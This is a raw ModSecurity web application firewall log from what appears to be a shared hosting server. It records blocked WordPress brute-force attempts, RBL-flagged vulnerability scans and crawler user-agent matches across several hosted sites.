[Tue May 26 17:11:54.314283 2026] [security2:error] [pid 860158:tid 860295] [client 172.224.240.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWHAoYFlz_JJsUnscKxXgAAAIw"]
[Tue May 26 17:11:55.878981 2026] [security2:error] [pid 860158:tid 860406] [client 103.174.5.177:42465] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHA4YFlz_JJsUnscKxlAAAAPs"]
[Tue May 26 17:11:55.879118 2026] [security2:error] [pid 860158:tid 860406] [client 103.174.5.177:42465] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHA4YFlz_JJsUnscKxlAAAAPs"]
[Tue May 26 17:11:56.108555 2026] [security2:error] [pid 860158:tid 860291] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHA4YFlz_JJsUnscKxjQAAAIg"]
[Tue May 26 17:11:56.468096 2026] [security2:error] [pid 860158:tid 860211] [remote 167.172.25.98:42998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWHBIYFlz_JJsUnscKxngAA_jQ"]
[Tue May 26 17:11:57.764957 2026] [security2:error] [pid 860158:tid 860383] [client 203.194.101.7:62757] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHBYYFlz_JJsUnscKx0wAAAOQ"]
[Tue May 26 17:11:57.765086 2026] [security2:error] [pid 860158:tid 860383] [client 203.194.101.7:62757] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHBYYFlz_JJsUnscKx0wAAAOQ"]
[Tue May 26 17:11:57.775303 2026] [security2:error] [pid 860158:tid 860415] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHBYYFlz_JJsUnscKxxwAAAQQ"]
[Tue May 26 17:11:58.366817 2026] [security2:error] [pid 860158:tid 860233] [remote 54.36.102.244:42686] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWHBoYFlz_JJsUnscKx3AAAlko"]
[Tue May 26 17:12:00.723818 2026] [security2:error] [pid 860158:tid 860400] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHCIYFlz_JJsUnscKyHAAAAPU"]
[Tue May 26 17:12:02.624518 2026] [security2:error] [pid 860158:tid 860293] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHCoYFlz_JJsUnscKyUAAAAIo"]
[Tue May 26 17:12:02.971033 2026] [security2:error] [pid 860158:tid 860274] [remote 95.216.117.13:38116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWHCoYFlz_JJsUnscKyYQAAlXM"]
[Tue May 26 17:12:04.207601 2026] [security2:error] [pid 860158:tid 860295] [client 185.191.171.12:41972] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahWHDIYFlz_JJsUnscKykAAAAIw"]
[Tue May 26 17:12:04.207753 2026] [security2:error] [pid 860158:tid 860295] [client 185.191.171.12:41972] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahWHDIYFlz_JJsUnscKykAAAAIw"]
[Tue May 26 17:12:04.566911 2026] [security2:error] [pid 860158:tid 860316] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHDIYFlz_JJsUnscKyjwAAAKE"]
[Tue May 26 17:12:05.750005 2026] [security2:error] [pid 860158:tid 860281] [remote 65.2.90.30:55654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWHDYYFlz_JJsUnscKysQAAxno"]
[Tue May 26 17:12:06.550245 2026] [security2:error] [pid 860158:tid 860351] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHDoYFlz_JJsUnscKywwAAAMQ"]
[Tue May 26 17:12:06.839224 2026] [security2:error] [pid 860158:tid 860170] [remote 178.156.182.155:59654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWHDoYFlz_JJsUnscKy0gAAoAs"]
[Tue May 26 17:12:08.142919 2026] [security2:error] [pid 860158:tid 860370] [client 203.194.101.7:63109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHEIYFlz_JJsUnscKy7gAAANc"]
[Tue May 26 17:12:08.143057 2026] [security2:error] [pid 860158:tid 860370] [client 203.194.101.7:63109] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHEIYFlz_JJsUnscKy7gAAANc"]
[Tue May 26 17:12:09.070162 2026] [security2:error] [pid 860158:tid 860364] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHEIYFlz_JJsUnscKzAAAAANE"]
[Tue May 26 17:12:10.201467 2026] [security2:error] [pid 860158:tid 860407] [client 45.86.200.40:51295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 40.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/bless.php"] [unique_id "ahWHEoYFlz_JJsUnscKzJAAAAPw"]
[Tue May 26 17:12:10.978395 2026] [security2:error] [pid 860158:tid 860386] [client 74.7.228.32:36650] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.rathnaa.co.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWHEoYFlz_JJsUnscKzSQAA5xg"]
[Tue May 26 17:12:11.210784 2026] [security2:error] [pid 860158:tid 860402] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHEoYFlz_JJsUnscKzQgAAAPc"]
[Tue May 26 17:12:12.497865 2026] [security2:error] [pid 860158:tid 860329] [client 46.29.238.105:0] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "lifestylemne.me"] [uri "/index.php"] [unique_id "ahWHE4YFlz_JJsUnscKzYAAAAK4"]
[Tue May 26 17:12:12.498464 2026] [security2:error] [pid 860158:tid 860408] [client 46.29.238.105:46498] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "lifestylemne.me"] [uri "/"] [unique_id "ahWHE4YFlz_JJsUnscKzXgAAAP0"]
[Tue May 26 17:12:12.524490 2026] [security2:error] [pid 860158:tid 860291] [client 192.186.159.82:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWHFIYFlz_JJsUnscKzegAAAIg"], referer: https://www.anujtradingco.com/
[Tue May 26 17:12:12.989913 2026] [security2:error] [pid 860158:tid 860350] [client 45.86.200.10:20051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/O-Simple.php"] [unique_id "ahWHFIYFlz_JJsUnscKzhQAAAMM"]
[Tue May 26 17:12:13.044999 2026] [security2:error] [pid 860158:tid 860317] [client 103.174.5.177:42893] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHFIYFlz_JJsUnscKzdAAAAKI"]
[Tue May 26 17:12:13.045126 2026] [security2:error] [pid 860158:tid 860317] [client 103.174.5.177:42893] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHFIYFlz_JJsUnscKzdAAAAKI"]
[Tue May 26 17:12:13.322020 2026] [security2:error] [pid 860158:tid 860316] [client 46.29.238.105:0] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "lifestylemne.me"] [uri "/index.php"] [unique_id "ahWHFYYFlz_JJsUnscKzlQAAAKE"]
[Tue May 26 17:12:13.322437 2026] [security2:error] [pid 860158:tid 860319] [client 46.29.238.105:53678] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "lifestylemne.me"] [uri "/"] [unique_id "ahWHFYYFlz_JJsUnscKzkwAAAKQ"]
[Tue May 26 17:12:13.485290 2026] [security2:error] [pid 860158:tid 860357] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHFYYFlz_JJsUnscKzjwAAAMo"]
[Tue May 26 17:12:13.526136 2026] [security2:error] [pid 860158:tid 860328] [client 46.29.238.105:0] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lifestylemne.me"] [uri "/index.php"] [unique_id "ahWHFYYFlz_JJsUnscKzmQAAAK0"]
[Tue May 26 17:12:13.526809 2026] [security2:error] [pid 860158:tid 860326] [client 46.29.238.105:46508] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lifestylemne.me"] [uri "/"] [unique_id "ahWHFYYFlz_JJsUnscKzlwAAAKs"]
[Tue May 26 17:12:13.663753 2026] [security2:error] [pid 860158:tid 860311] [client 46.29.238.105:0] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lifestylemne.me"] [uri "/index.php"] [unique_id "ahWHFYYFlz_JJsUnscKzpAAAAJw"]
[Tue May 26 17:12:13.667311 2026] [security2:error] [pid 860158:tid 860358] [client 46.29.238.105:53688] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lifestylemne.me"] [uri "/"] [unique_id "ahWHFYYFlz_JJsUnscKzogAAAMs"]
[Tue May 26 17:12:14.086583 2026] [security2:error] [pid 860158:tid 860310] [client 46.29.238.105:0] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lifestylemne.me"] [uri "/index.php"] [unique_id "ahWHFoYFlz_JJsUnscKztwAAAJs"]
[Tue May 26 17:12:14.087122 2026] [security2:error] [pid 860158:tid 860307] [client 46.29.238.105:46512] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lifestylemne.me"] [uri "/robots.txt"] [unique_id "ahWHFoYFlz_JJsUnscKztAAAAJg"]
[Tue May 26 17:12:14.539942 2026] [security2:error] [pid 860158:tid 860407] [client 46.29.238.105:0] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lifestylemne.me"] [uri "/index.php"] [unique_id "ahWHFoYFlz_JJsUnscKzwQAAAPw"]
[Tue May 26 17:12:14.540604 2026] [security2:error] [pid 860158:tid 860324] [client 46.29.238.105:46512] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lifestylemne.me"] [uri "/portfolio/service-3/"] [unique_id "ahWHFoYFlz_JJsUnscKzvwAAAKk"]
[Tue May 26 17:12:14.851812 2026] [security2:error] [pid 860158:tid 860399] [client 46.29.238.105:0] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lifestylemne.me"] [uri "/index.php"] [unique_id "ahWHFoYFlz_JJsUnscKzzQAAAPQ"]
[Tue May 26 17:12:14.852488 2026] [security2:error] [pid 860158:tid 860337] [client 46.29.238.105:47998] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lifestylemne.me"] [uri "/blog/"] [unique_id "ahWHFoYFlz_JJsUnscKzywAAALY"]
[Tue May 26 17:12:14.900304 2026] [security2:error] [pid 860158:tid 860353] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHFoYFlz_JJsUnscKzvgAAAMY"]
[Tue May 26 17:12:15.126793 2026] [security2:error] [pid 860158:tid 860349] [client 46.29.238.105:0] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lifestylemne.me"] [uri "/index.php"] [unique_id "ahWHF4YFlz_JJsUnscKz2QAAAMI"]
[Tue May 26 17:12:15.127346 2026] [security2:error] [pid 860158:tid 860380] [client 46.29.238.105:47998] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lifestylemne.me"] [uri "/about-us/"] [unique_id "ahWHF4YFlz_JJsUnscKz0gAAAOE"]
[Tue May 26 17:12:15.134707 2026] [security2:error] [pid 860158:tid 860319] [client 46.29.238.105:0] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lifestylemne.me"] [uri "/index.php"] [unique_id "ahWHF4YFlz_JJsUnscKz2gAAAKQ"]
[Tue May 26 17:12:15.135187 2026] [security2:error] [pid 860158:tid 860365] [client 46.29.238.105:46512] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lifestylemne.me"] [uri "/contact/"] [unique_id "ahWHF4YFlz_JJsUnscKz0wAAANI"]
[Tue May 26 17:12:15.188669 2026] [security2:error] [pid 860158:tid 860394] [client 45.86.200.28:43247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/lock360.php"] [unique_id "ahWHF4YFlz_JJsUnscKz1wAAAO8"]
[Tue May 26 17:12:15.450770 2026] [security2:error] [pid 860158:tid 860338] [client 46.29.238.105:0] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.lifestylemne.me"] [uri "/index.php"] [unique_id "ahWHF4YFlz_JJsUnscKz5AAAALc"]
[Tue May 26 17:12:15.450795 2026] [security2:error] [pid 860158:tid 860338] [client 46.29.238.105:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.lifestylemne.me"] [uri "/index.php"] [unique_id "ahWHF4YFlz_JJsUnscKz5AAAALc"]
[Tue May 26 17:12:15.453369 2026] [security2:error] [pid 860158:tid 860328] [client 46.29.238.105:48004] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.lifestylemne.me"] [uri "/ads.txt"] [unique_id "ahWHF4YFlz_JJsUnscKz4gAAAK0"]
[Tue May 26 17:12:15.508688 2026] [security2:error] [pid 860158:tid 860364] [client 146.174.171.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHF4YFlz_JJsUnscKz2wAAANE"]
[Tue May 26 17:12:17.199575 2026] [security2:error] [pid 860158:tid 860372] [client 192.186.159.82:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWHGYYFlz_JJsUnscK0DAAAANk"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1420400&moderation-hash=876f126bf1b4f77b385affb129e48aff
[Tue May 26 17:12:17.381318 2026] [security2:error] [pid 860158:tid 860305] [client 45.86.200.50:46791] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/zwso.php"] [unique_id "ahWHGYYFlz_JJsUnscK0FgAAAJY"]
[Tue May 26 17:12:17.840997 2026] [security2:error] [pid 860158:tid 860355] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHGYYFlz_JJsUnscK0IAAAAMg"]
[Tue May 26 17:12:18.601613 2026] [security2:error] [pid 860158:tid 860335] [client 203.194.101.7:63463] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHGoYFlz_JJsUnscK0QAAAALQ"]
[Tue May 26 17:12:18.601760 2026] [security2:error] [pid 860158:tid 860335] [client 203.194.101.7:63463] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHGoYFlz_JJsUnscK0QAAAALQ"]
[Tue May 26 17:12:18.687731 2026] [security2:error] [pid 860158:tid 860324] [client 114.119.134.127:22877] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.plenitudotonal.com"] [uri "/nueva/modalidades-de-servicios"] [unique_id "ahWHGoYFlz_JJsUnscK0QgAAAKk"], referer: https://www.plenitudotonal.com/nueva/modelo-asistencial
[Tue May 26 17:12:18.799094 2026] [security2:error] [pid 860158:tid 860258] [remote 209.42.18.223:59204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWHGoYFlz_JJsUnscK0QQAA3GM"]
[Tue May 26 17:12:19.907670 2026] [security2:error] [pid 860158:tid 860288] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHG4YFlz_JJsUnscK0VgAAAIU"]
[Tue May 26 17:12:20.173424 2026] [security2:error] [pid 860158:tid 860326] [client 45.86.200.37:59765] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 37.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/chosen.php"] [unique_id "ahWHG4YFlz_JJsUnscK0awAAAKs"]
[Tue May 26 17:12:22.190685 2026] [security2:error] [pid 860158:tid 860322] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHHYYFlz_JJsUnscK0oAAAAKc"]
[Tue May 26 17:12:22.235198 2026] [security2:error] [pid 860158:tid 860412] [client 45.86.200.5:35729] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/about.php"] [unique_id "ahWHHoYFlz_JJsUnscK0rAAAAQE"]
